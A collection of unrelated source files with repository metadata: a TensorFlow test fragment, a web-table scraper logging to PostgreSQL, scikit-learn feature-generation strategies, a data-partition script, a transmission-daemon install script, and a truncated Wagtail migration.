# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"gradients/dense/BiasAdd_grad/BiasAddGrad:0",
"gradients/dense/MatMul_grad/MatMul_1:0"
]
grads[1] = []
if new_tf_version:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/Reshape_1:0",
"gradients/ffn/outputs/MatMul_grad/Reshape_1:0"
]
else:
if six.PY2:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/MatMul_1:0",
"gradients/ffn/outputs/MatMul_grad/MatMul_1:0"
]
else:
grads[2] = [
"gradients/ffn/inter_outputs/transpose_1_grad/transpose:0",
"gradients/ffn/outputs/transpose_1_grad/transpose:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
# pylint: enable=missing-docstring,protected-access,unused-argument,arguments-differ
# pylint: enable=line-too-long,bad-continuation,unused-variable
if __name__ == "__main__":
test.main()
# File: grazer_modules/tables.py (repo: Andrew95496/hypergraze, license: MIT)
import sys
sys.path.append(os.path.dirname(os.path.abspath('config.py')))
from bs4 import BeautifulSoup
from numpy import byte
import requests
import psycopg2
import pandas as pd
import datetime
import subprocess
from pathlib import Path
from tkinter import messagebox as mb
# My Modules
from configs import config as cf
CMD = '''
on run argv
display notification (item 2 of argv) with title (item 1 of argv)
end run
'''
def notify(title, text):
subprocess.call(['osascript', '-e', CMD, title, text])
downloads_path = str(Path.home() / "Downloads")
def find_all_tables_to_excel(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
bytes = 0
count = 1
table = html.find_all('table', {'class': f'{ATTR_NAME}'})
tables = pd.read_html(str(table))
for table in tables:
table = pd.DataFrame(table)
table.to_excel( f'{downloads_path}/{FILENAME}{count}.xlsx')
size = os.path.getsize(f'{downloads_path}/{FILENAME}{count}.xlsx')
bytes += size
count += 1
mb.showinfo('Info', f'''All files sent to:\n {downloads_path}/\n
file size: {bytes} bytes
''')
#* Insert into database web_data
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE ,str(tables),bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
#* Insert into database web_data
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
def find_all_tables_to_std(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
bytes = 0
count = 1
table = html.find_all('table', {'class': f'{ATTR_NAME}'})
tables = pd.read_html(str(table))
for table in tables:
with open(f'{downloads_path}/{FILENAME}{count}.{FILETYPE}', 'w') as text_file:
text_file.write(str(table))
size = os.path.getsize(f'{downloads_path}/{FILENAME}{count}.{FILETYPE}')
bytes += size
count += 1
mb.showinfo('Info', f'''All files sent to:\n {downloads_path}/\n
file size: {bytes} bytes
''')
#* Insert into database
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, str(tables), bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
def find_one_table_to_std(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
bytes = 0
count = 1
table = html.find('table', {'class': f'{ATTR_NAME}'})
table = table.get_text()
with open(f'{downloads_path}/{FILENAME}.{FILETYPE}', 'w') as text_file:
text_file.write(str(table))
size = os.path.getsize(f'{downloads_path}/{FILENAME}.{FILETYPE}')
bytes += size
mb.showinfo('Info', f'''file sent to:\n {downloads_path}/{FILENAME}.{FILETYPE}\n
file size: {bytes} bytes
''')
#* Insert into database
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, str(table), bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
def find_one_table_to_excel(URL,HTML_TAG, ATTR_NAME, FILENAME, FILETYPE):
CONN = psycopg2.connect(
host = cf.hostname,
dbname = cf.database,
user = cf.username,
password = cf.pwd,
port = cf.port_id)
CUR = CONN.cursor()
notify('HYPERGRAZE©', '(tables) database connected...')
res = requests.get(URL)
src = res.content
html = BeautifulSoup(src, 'lxml')
notify('HYPERGRAZE©', 'grazing the web...')
bytes = 0
count = 1
table = html.find('table', {'class': f'{ATTR_NAME}'})
table = pd.read_html(str(table))
table = pd.DataFrame(table[0])
table.to_excel( f'{downloads_path}/{FILENAME}.xlsx' )
bytes = os.path.getsize(f'{downloads_path}/{FILENAME}.{FILETYPE}')
mb.showinfo('Info', f'''file sent to:\n {downloads_path}/{FILENAME}.{FILETYPE}\n
file size: {bytes} bytes
''')
#* Insert into database
INSERT_SCRIPT = 'insert into web_data (url, html_tag, file_type, results, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, str(table), bytes, datetime.datetime.now())
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'web_data entered')
INSERT_SCRIPT = 'insert into user_data (url, html_tag, file_type, files, bytes, date) values (%s, %s, %s, %s, %s, %s);'
INSERT_VALUES = (URL, HTML_TAG, FILETYPE, count, bytes, datetime.datetime.now() )
CUR.execute(INSERT_SCRIPT, INSERT_VALUES)
notify('HYPERGRAZE©', 'user_data entered')
CONN.commit()
# ! ALL WAYS CLOSE CONNECTIONS
CUR.close()
CONN.close()
notify('HYPERGRAZE©', '(tables) database disconnected')
| 32.333333 | 124 | 0.633418 | 994 | 7,469 | 4.644869 | 0.129779 | 0.017327 | 0.020793 | 0.020793 | 0.885423 | 0.87611 | 0.857483 | 0.842755 | 0.831709 | 0.815465 | 0 | 0.003255 | 0.218369 | 7,469 | 230 | 125 | 32.473913 | 0.784687 | 0.034007 | 0 | 0.769697 | 0 | 0.048485 | 0.319217 | 0.054707 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0.024242 | 0.072727 | 0 | 0.10303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# File: tests/context.py (repo: ISalimzhanov/devops_lab1, license: PSF-2.0)
import web_app
import web_app.helpers as helpers
# File: features/feature_generation_strategy.py (repo: jmrozanec/features-generator, license: Apache-2.0)
from sklearn.decomposition import PCA, TruncatedSVD, FastICA
from sklearn.random_projection import GaussianRandomProjection, SparseRandomProjection
import abc
class FeatureGenerationStrategyFactory(object):
    @staticmethod
    def create(strategy_name):
        if strategy_name == "sum": return SumFeatureGenerationStrategy()
        if strategy_name == "diff": return DiffFeatureGenerationStrategy()
        if strategy_name == "prod": return ProdFeatureGenerationStrategy()
        if strategy_name == "div": return DivFeatureGenerationStrategy()
        if strategy_name == "avg": return AvgFeatureGenerationStrategy()
        if strategy_name == "max": return MaxFeatureGenerationStrategy()
        if strategy_name == "min": return MinFeatureGenerationStrategy()
        if strategy_name == "pca": return PCAFeatureGenerationStrategy()
        if strategy_name == "tsvd": return TSVDFeatureGenerationStrategy()
        if strategy_name == "ica": return ICAFeatureGenerationStrategy()
        if strategy_name == "grp": return GRPFeatureGenerationStrategy()
        if strategy_name == "srp": return SRPFeatureGenerationStrategy()
        raise ValueError("Unknown feature generation strategy: {}".format(strategy_name))
class ColumnBasedFeatureGenerationStrategyAbstract(object):
"""Provides abstraction for features generation"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def generate(self, train, val, test, colname1, colname2):
"""Required Method"""
@abc.abstractmethod
def featurename(self, colname1, colname2):
"""Required Method"""
@abc.abstractmethod
def equivalent_featurenames(self, colname1, colname2):
"""Required Method. Used to reflect commutativity."""
class SumFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)] = train[[colname1, colname2]].sum(axis=1)
val[self.featurename(colname1, colname2)] = val[[colname1, colname2]].sum(axis=1)
test[self.featurename(colname1, colname2)] = test[[colname1, colname2]].sum(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_sum_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class DiffFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[colname1]-train[colname2]
        val[self.featurename(colname1, colname2)]=val[colname1]-val[colname2]
test[self.featurename(colname1, colname2)]=test[colname1]-test[colname2]
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_diff_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2)]
class ProdFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[colname1]*train[colname2]
val[self.featurename(colname1, colname2)]=val[colname1]*val[colname2]
test[self.featurename(colname1, colname2)]=test[colname1]*test[colname2]
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_prod_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class DivFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[colname1]/train[colname2]
val[self.featurename(colname1, colname2)]=val[colname1]/val[colname2]
test[self.featurename(colname1, colname2)]=test[colname1]/test[colname2]
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_div_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2)]
class AvgFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[[colname1, colname2]].mean(axis=1)
val[self.featurename(colname1, colname2)]=val[[colname1, colname2]].mean(axis=1)
test[self.featurename(colname1, colname2)]=test[[colname1, colname2]].mean(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_avg_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class MaxFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[[colname1, colname2]].max(axis=1)
val[self.featurename(colname1, colname2)]=val[[colname1, colname2]].max(axis=1)
test[self.featurename(colname1, colname2)]=test[[colname1, colname2]].max(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_max_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
class MinFeatureGenerationStrategy(ColumnBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, colname1, colname2):
train[self.featurename(colname1, colname2)]=train[[colname1, colname2]].min(axis=1)
val[self.featurename(colname1, colname2)]=val[[colname1, colname2]].min(axis=1)
test[self.featurename(colname1, colname2)]=test[[colname1, colname2]].min(axis=1)
return (train, val, test)
def featurename(self, colname1, colname2):
return "{}_min_{}".format(colname1, colname2)
def equivalent_featurenames(self, colname1, colname2):
return [self.featurename(colname1, colname2), self.featurename(colname2, colname1)]
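To make the contract of these column-based strategies concrete, here is a self-contained sketch that exercises the sum behavior on toy DataFrames. The `SumStrategy` class and the column names are invented for illustration; it mirrors `SumFeatureGenerationStrategy` above rather than importing it, so the snippet runs on its own:

```python
import pandas as pd

class SumStrategy:
    """Standalone mirror of SumFeatureGenerationStrategy, for illustration only."""
    def featurename(self, colname1, colname2):
        return "{}_sum_{}".format(colname1, colname2)
    def generate(self, train, val, test, colname1, colname2):
        name = self.featurename(colname1, colname2)
        for df in (train, val, test):
            # Same row-wise sum the real strategy applies to each split.
            df[name] = df[[colname1, colname2]].sum(axis=1)
        return train, val, test

train = pd.DataFrame({"a": [1.0, 2.0], "b": [3.0, 4.0]})
val = pd.DataFrame({"a": [5.0], "b": [6.0]})
test_df = pd.DataFrame({"a": [7.0], "b": [8.0]})
train, val, test_df = SumStrategy().generate(train, val, test_df, "a", "b")
print(train["a_sum_b"].tolist())  # [4.0, 6.0]
```

The same shape applies to the other strategies: a deterministic feature name plus the new column appended to all three splits.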
# Features based on decomposition methods
class DecompositionBasedFeatureGenerationStrategyAbstract(object):
"""Provides abstraction for features generation"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def generate(self, train, val, test):
"""Required Method"""
@abc.abstractmethod
def featurename(self, idx):
"""Required Method"""
@abc.abstractmethod
def equivalent_featurenames(self, idx):
"""Required Method. Used to reflect commutativity."""
class PCAFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
def generate(self, train, val, test, n_comps):
decomposer = PCA(n_components=n_comps, random_state=1234)
results_train = decomposer.fit_transform(train)
        results_val = decomposer.transform(val)  # reuse the train fit instead of refitting on val
results_test = decomposer.transform(test)
for i in range(1, n_comps + 1):
train[self.featurename(i)] = results_train[:, i - 1]
val[self.featurename(i)] = results_val[:, i - 1]
test[self.featurename(i)] = results_test[:, i - 1]
return (train, val, test)
def featurename(self, idx):
return "pca_{}".format(str(idx))
def equivalent_featurenames(self, idx):
return [self.featurename(idx)]
class TSVDFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
    def generate(self, train, val, test, n_comps):
        decomposer = TruncatedSVD(n_components=n_comps, random_state=1234)
        results_train = decomposer.fit_transform(train)
        # Project val with the decomposer fitted on train, matching test.
        results_val = decomposer.transform(val)
        results_test = decomposer.transform(test)
        for i in range(1, n_comps + 1):
            train[self.featurename(i)] = results_train[:, i - 1]
            val[self.featurename(i)] = results_val[:, i - 1]
            test[self.featurename(i)] = results_test[:, i - 1]
        return (train, val, test)

    def featurename(self, idx):
        return "tsvd_{}".format(str(idx))

    def equivalent_featurenames(self, idx):
        return [self.featurename(idx)]
class ICAFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
    def generate(self, train, val, test, n_comps):
        decomposer = FastICA(n_components=n_comps, random_state=1234)
        results_train = decomposer.fit_transform(train)
        # Project val with the decomposer fitted on train, matching test.
        results_val = decomposer.transform(val)
        results_test = decomposer.transform(test)
        for i in range(1, n_comps + 1):
            train[self.featurename(i)] = results_train[:, i - 1]
            val[self.featurename(i)] = results_val[:, i - 1]
            test[self.featurename(i)] = results_test[:, i - 1]
        return (train, val, test)

    def featurename(self, idx):
        return "ica_{}".format(str(idx))

    def equivalent_featurenames(self, idx):
        return [self.featurename(idx)]
class GRPFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
    def generate(self, train, val, test, n_comps):
        decomposer = GaussianRandomProjection(n_components=n_comps, random_state=1234)
        results_train = decomposer.fit_transform(train)
        # Project val with the decomposer fitted on train, matching test.
        results_val = decomposer.transform(val)
        results_test = decomposer.transform(test)
        for i in range(1, n_comps + 1):
            train[self.featurename(i)] = results_train[:, i - 1]
            val[self.featurename(i)] = results_val[:, i - 1]
            test[self.featurename(i)] = results_test[:, i - 1]
        return (train, val, test)

    def featurename(self, idx):
        return "grp_{}".format(str(idx))

    def equivalent_featurenames(self, idx):
        return [self.featurename(idx)]
class SRPFeatureGenerationStrategy(DecompositionBasedFeatureGenerationStrategyAbstract):
    def generate(self, train, val, test, n_comps):
        decomposer = SparseRandomProjection(n_components=n_comps, random_state=1234)
        results_train = decomposer.fit_transform(train)
        # Project val with the decomposer fitted on train, matching test.
        results_val = decomposer.transform(val)
        results_test = decomposer.transform(test)
        for i in range(1, n_comps + 1):
            train[self.featurename(i)] = results_train[:, i - 1]
            val[self.featurename(i)] = results_val[:, i - 1]
            test[self.featurename(i)] = results_test[:, i - 1]
        return (train, val, test)

    def featurename(self, idx):
        # Fixed copy-paste bug: this strategy must emit "srp_" names, not "grp_",
        # otherwise its features collide with GRPFeatureGenerationStrategy's.
        return "srp_{}".format(str(idx))

    def equivalent_featurenames(self, idx):
        return [self.featurename(idx)]
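The Max/Min and decomposition strategies above all share one small interface: `generate` adds columns, `featurename` builds the column name, and `equivalent_featurenames` records which names are interchangeable. Here is a minimal, dependency-free sketch of that pattern, using a plain dict of column lists instead of the pandas DataFrames the real classes operate on (that substitution is an assumption for illustration only):

```python
# Hypothetical miniature of the strategy interface above; dicts of lists
# stand in for pandas DataFrames so the sketch runs without dependencies.
class MaxStrategy:
    def featurename(self, c1, c2):
        return "{}_max_{}".format(c1, c2)

    def equivalent_featurenames(self, c1, c2):
        # Reflects commutativity: max(x, y) == max(y, x).
        return [self.featurename(c1, c2), self.featurename(c2, c1)]

    def generate(self, frame, c1, c2):
        frame[self.featurename(c1, c2)] = [max(a, b) for a, b in zip(frame[c1], frame[c2])]
        return frame


train = {"x": [1, 5, 3], "y": [4, 2, 3]}
MaxStrategy().generate(train, "x", "y")
# train["x_max_y"] is now [4, 5, 3]
```

The `equivalent_featurenames` hook is what lets a caller skip generating `y_max_x` once `x_max_y` already exists.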
| 46.320513 | 93 | 0.703109 | 1,122 | 10,839 | 6.686275 | 0.081105 | 0.151426 | 0.085844 | 0.115702 | 0.819515 | 0.813916 | 0.811117 | 0.783924 | 0.765796 | 0.765796 | 0 | 0.02554 | 0.179998 | 10,839 | 233 | 94 | 46.519313 | 0.818519 | 0.026755 | 0 | 0.621469 | 0 | 0 | 0.012562 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242938 | false | 0 | 0.016949 | 0.135593 | 0.559322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
d1f17a122ce911147b1674ee9071df53b23f342a | 935 | py | Python | shhs/partition_cv.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 27 | 2019-04-26T21:12:52.000Z | 2022-03-13T15:51:18.000Z | shhs/partition_cv.py | Hongyang449/DeepSleep | f779e050e4ad1ba7b96ddf0c9aef421770bbbd53 | [
"MIT"
] | 3 | 2021-07-20T15:35:07.000Z | 2021-11-12T15:35:52.000Z | shhs/partition_cv.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 9 | 2019-06-12T20:10:24.000Z | 2021-12-08T12:45:36.000Z | #!/usr/bin/env python
import os
import sys
import numpy as np
import scipy.io


def partition(id_path, train_path, test_path, n_total=1000, n_train=750):
    """Read ids, shuffle the first n_total reproducibly, and write a train/test split."""
    id_all = []
    f = open(id_path, 'r')
    for line in f:
        id_all.append(line.rstrip())
    f.close()
    # shuffle
    id_all = np.array(id_all[:n_total])
    np.random.seed(449)
    index = np.arange(len(id_all))
    np.random.shuffle(index)
    id_all = id_all[index]
    f = open(train_path, 'w')
    for the_id in id_all[:n_train]:
        f.write('%s\n' % the_id)
    f.close()
    f = open(test_path, 'w')
    for the_id in id_all[n_train:]:
        f.write('%s\n' % the_id)
    f.close()


partition('id1.txt', 'id_train1.dat', 'id_test1.dat')
partition('id2.txt', 'id_train2.dat', 'id_test2.dat')
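The split relies on `np.random.seed(449)` making the shuffle identical every time the script runs, so the same ids always land in the same partition. The same idea in a stdlib-only sketch (`random.Random` stands in for NumPy here, purely for illustration):

```python
import random


def split_ids(ids, seed=449, n_train=3):
    # A privately seeded RNG makes the shuffle, and hence the split, reproducible.
    rng = random.Random(seed)
    shuffled = list(ids)
    rng.shuffle(shuffled)
    return shuffled[:n_train], shuffled[n_train:]


ids = ["id%d" % i for i in range(5)]
first = split_ids(ids)
second = split_ids(ids)
assert first == second  # identical seed -> identical partition
```

Using a dedicated `random.Random` instance (rather than reseeding the global RNG, as the script does) also avoids perturbing any other code that draws random numbers.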
| 13.955224 | 32 | 0.652406 | 189 | 935 | 3.068783 | 0.243386 | 0.155172 | 0.048276 | 0.068966 | 0.813793 | 0.813793 | 0.813793 | 0.813793 | 0.813793 | 0.813793 | 0 | 0.039702 | 0.137968 | 935 | 66 | 33 | 14.166667 | 0.679901 | 0.038503 | 0 | 0.75 | 0 | 0 | 0.097506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae525544f801d03ab0f54567a9fb943d7bd7aaa4 | 174 | py | Python | setup-transmission.py | krthkj/pythonDumps | 92bc29d15ae5a677fbffc89dc0c6053d62a30e60 | [
"MIT"
] | null | null | null | setup-transmission.py | krthkj/pythonDumps | 92bc29d15ae5a677fbffc89dc0c6053d62a30e60 | [
"MIT"
] | null | null | null | setup-transmission.py | krthkj/pythonDumps | 92bc29d15ae5a677fbffc89dc0c6053d62a30e60 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import subprocess
subprocess.call(["sudo", "apt-get", "-fy", "update"])
subprocess.call(["sudo", "apt-get", "-fy", "install", "transmission-daemon"])
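Note that `subprocess.call` only returns the command's exit status and never raises on failure, so the script above would silently continue even if the `update` step failed; `subprocess.check_call` raises `CalledProcessError` instead. A small self-contained illustration, using the Python interpreter itself as the command so the example does not depend on apt:

```python
import subprocess
import sys

# call() returns the exit status; the caller must inspect it.
rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(3)"])
assert rc == 3

# check_call() raises CalledProcessError on a non-zero status; on success
# (exit 0) it simply returns None.
subprocess.check_call([sys.executable, "-c", "pass"])
```

For setup scripts like this one, `check_call` (or checking `rc != 0` and aborting) is usually the safer default.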
| 17.4 | 78 | 0.637931 | 21 | 174 | 5.285714 | 0.666667 | 0.252252 | 0.324324 | 0.378378 | 0.468468 | 0.468468 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 174 | 9 | 79 | 19.333333 | 0.711538 | 0.091954 | 0 | 0 | 0 | 0 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ae5d32448ff29d19231d64012bf70364facbf55e | 4,305 | py | Python | kehmet/migrations/0006_add_collapsible_block.py | HotStew/digihel | 3a53f6542b41c64c818fa34cc0709cdbfb8055db | [
"MIT"
] | 21 | 2016-08-22T10:15:24.000Z | 2022-03-23T08:10:48.000Z | kehmet/migrations/0006_add_collapsible_block.py | HotStew/digihel | 3a53f6542b41c64c818fa34cc0709cdbfb8055db | [
"MIT"
] | 101 | 2016-08-08T07:52:44.000Z | 2021-06-17T20:18:59.000Z | kehmet/migrations/0006_add_collapsible_block.py | HotStew/digihel | 3a53f6542b41c64c818fa34cc0709cdbfb8055db | [
"MIT"
] | 16 | 2016-08-02T11:45:26.000Z | 2021-02-18T11:27:34.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-17 17:02
from __future__ import unicode_literals
from django.db import migrations
import wagtail.contrib.table_block.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtail_svgmap.blocks
class Migration(migrations.Migration):

    dependencies = [
        ('kehmet', '0005_kehmetcontentpage_show_in_submenus'),
    ]

    operations = [
        migrations.AlterField(
            model_name='kehmetcontentpage',
            name='body',
field=wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False))))), ('two_columns', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-left', label='Left column content')), ('right_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-right', label='Right column content'))))), ('collapsible', wagtail.core.blocks.RichTextBlock(icon='collapse-down', label='Collapsible paragraph', template='content/blocks/collapsible.html')))),
        ),
        migrations.AlterField(
            model_name='kehmetfrontpage',
            name='body',
field=wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False))))), ('two_columns', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-left', label='Left column content')), 